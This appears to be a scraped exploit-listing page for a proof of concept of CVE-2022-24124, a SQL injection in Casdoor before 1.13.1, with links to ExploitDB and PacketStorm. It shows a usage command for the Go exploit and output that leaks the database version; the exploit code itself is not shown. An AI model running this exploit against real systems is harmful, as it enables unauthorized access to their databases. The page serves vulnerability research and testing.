## https://sploitus.com/exploit?id=BE51EA03-8EDF-5956-B032-2D687BDB6465
# POC for CVE-2022-24124

> Exploit Code for [CVE-2022-24124](https://nvd.nist.gov/vuln/detail/CVE-2022-24124) aka Casdoor SQL Injection

Exploit Links: [[ExploitDB-50792](https://www.exploit-db.com/exploits/50792)] [[PacketStormSecurity](https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html)]

Expected outcome: Dumps the SQL database version on a host running Casdoor < 1.13.1

Intended only for educational use and testing in corporate environments.

### Exploit Usage

```shell
Barricade➜ go run exploit.go -u http://127.0.0.1:8080

-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)

[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1
```